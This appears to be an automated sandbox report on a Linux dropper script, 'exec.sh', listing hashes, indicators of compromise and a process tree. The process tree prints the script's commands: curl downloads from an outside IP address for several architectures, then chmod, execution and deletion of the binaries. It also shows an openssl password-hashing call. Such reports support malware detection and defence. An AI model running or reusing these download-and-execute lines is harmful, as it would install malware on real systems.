Analysis
-
max time kernel
148s
-
max time network
147s
-
platform
debian-9_armhf
-
resource
debian9-armhf-20240226-en
-
resource tags
arch:armhf image:debian9-armhf-20240226-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
-
submitted
13-03-2024 23:00
Static task
static1
Behavioral task
behavioral1
Sample
exec.sh
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
exec.sh
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
exec.sh
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
exec.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
exec.sh
-
Size
842B
-
MD5
4eeac4436b9c68f85b1c3a2bae62d3f3
-
SHA1
4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
-
SHA256
bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
-
SHA512
e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
ioc | pid | process
/tmp/386_binary | 758 | 386_binary
/tmp/amd64_binary | 769 | amd64_binary
/tmp/arm_binary | 780 | arm_binary
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicates whether the system is a virtual machine.
Processes:
description | ioc | process
File opened for reading | /proc/cpuinfo | curl
File opened for reading | /proc/cpuinfo | curl
File opened for reading | /proc/cpuinfo | curl
File opened for reading | /proc/cpuinfo | curl
-
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
description | ioc | process
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | arm_binary
-
Reads runtime system information 8 IoCs
Reads data from /proc virtual filesystem.
Processes:
description | ioc | process
File opened for reading | /proc/self/auxv | curl
File opened for reading | /proc/sys/crypto/fips_enabled | curl
File opened for reading | /proc/self/auxv | curl
File opened for reading | /proc/sys/crypto/fips_enabled | curl
File opened for reading | /proc/self/auxv | curl
File opened for reading | /proc/sys/crypto/fips_enabled | curl
File opened for reading | /proc/self/auxv | curl
File opened for reading | /proc/sys/crypto/fips_enabled | curl
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | process
File opened for modification | /tmp/arm64_binary | curl
File opened for modification | /tmp/386_binary | curl
File opened for modification | /tmp/amd64_binary | curl
File opened for modification | /tmp/arm_binary | curl
Processes
- /tmp/exec.sh
  command: /tmp/exec.sh
  - /usr/bin/curl
    command: curl -o 386_binary http://5.10.249.153:9999/386
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod
    command: chmod +x 386_binary
  - /tmp/386_binary
    command: ./386_binary
    - Executes dropped EXE
  - /bin/rm
    command: rm -rf 386_binary
  - /usr/bin/curl
    command: curl -o amd64_binary http://5.10.249.153:9999/amd64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod
    command: chmod +x amd64_binary
  - /tmp/amd64_binary
    command: ./amd64_binary
    - Executes dropped EXE
  - /bin/rm
    command: rm -rf amd64_binary
  - /usr/bin/curl
    command: curl -o arm_binary http://5.10.249.153:9999/arm
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/chmod
    command: chmod +x arm_binary
  - /tmp/arm_binary
    command: ./arm_binary
    - Executes dropped EXE
    - Enumerates kernel/hardware configuration
    - /usr/bin/openssl
      command: openssl passwd -6 scmg40I9gecr
  - /bin/rm
    command: rm -rf arm_binary
  - /usr/bin/curl
    command: curl -o arm64_binary http://5.10.249.153:9999/arm64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
-
/tmp/386_binary
Filesize
420KB
MD5
c844c5c14bd7b2ca8d8a585f0bb4b0c8
SHA1
d5f7155b192c31f9d8842a36a92047ef171ea10f
SHA256
a5f83fdef2bae782dd96949e9d1caa38440621f9b4a61008be1acda95ee87e92
SHA512
8b74d415627379c8e9f862821f462406654bd40b1391a65a3c43056bf62026e3d3218d8567e14f678e172e95c0853b9bc9667c5a2c280fa891cb292d8aab8663
-
/tmp/amd64_binary
Filesize
64KB
MD5
733642767a2782e29b1300f0cc3bb5af
SHA1
a0f8d340e855f752f4597c833b3a0ea9d617238d
SHA256
c7f031e99869413fe8e58fdf04768fc42edbadd773639eb13bddafe2161643dc
SHA512
17b29aca11bf10268aa43689cd199b3adbdadcf052c2bb4365255979524ad3822546d243068f3d3a0812ac4fe1e1db4f2bee7a4183c8c626ae9c82a64572a9e4
-
/tmp/arm64_binary
Filesize
19KB
MD5
f8b0a6c9ed9d33191661fce600b819ac
SHA1
cd3e411eb4e115c249a25bde87f7e3d876bf245d
SHA256
1364c16c4464d2840c2316bb0c9508dcfff922e121192596342189b2826d6557
SHA512
7f441f9195a2ac1f01f92c081624c4eaedc0ef30d093d1990e9cb52a5da27a90a5b1abd64df75b57774fadb1b23cb35c2f41aca2325f702e687213fcdef47770
-
/tmp/arm_binary
Filesize
168KB
MD5
6818fc04117b0863b9489962c744bce6
SHA1
ba296427584041f5fcbdb56c8280387ffe42137e
SHA256
e469a8fe15ef6d6f28380f3a268423dd501d1d653b164d88412362e2f2c76b43
SHA512
7a57546909cb6c4672f28575243c87aa023828cee4660e64b98b22394ebb8858ca7d812c3bd622ba57dff708bb0c09fb2df2e8768e541b4939176744fa4f062f